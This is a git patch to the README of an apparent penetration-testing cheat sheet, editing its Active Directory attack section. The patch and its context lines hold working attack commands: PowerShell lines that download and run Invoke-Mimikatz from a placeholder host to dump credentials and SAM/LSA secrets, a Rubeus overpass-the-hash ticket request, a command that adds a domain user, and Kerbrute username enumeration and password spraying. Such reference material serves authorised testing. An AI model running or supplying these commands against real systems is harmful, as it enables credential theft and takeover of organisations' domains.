From 69983aa425df1ac943b39f9a2648f8969bad79b5 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 4 Oct 2022 12:43:41 -0400
Subject: [PATCH] Update README.md

---
 README.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 18c91b4..b147c9f 100644
--- a/README.md
+++ b/README.md
@@ -668,6 +668,8 @@ download {FILE.exe}
 
 ![Active Directory](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png)
 
+[https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks](https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks)
+
 ```bash
 # Enumerate all local accounts
 net user
@@ -687,11 +689,15 @@ net user {USERNAME} {PASSWORD} /add /domain
 # Add user to group
 net group "{GROUP}" {USERNAME} /add
 
-# MimiKatz Cred Dump
+# MimiKatz Cred Dump Pass the Hash
 sekurlsa::logonpasswords
 IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds 
 IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
 
+# Rubeus Overpass the hash
+rubeus.exe asktgt /domain:{DOMAIN}/user:{USER} /rc4:{NT HASH} /ptt
+klist
+
 # Kerbrute Brute Force
 sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt  
 sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS}  {user.txt} {passwords.txt}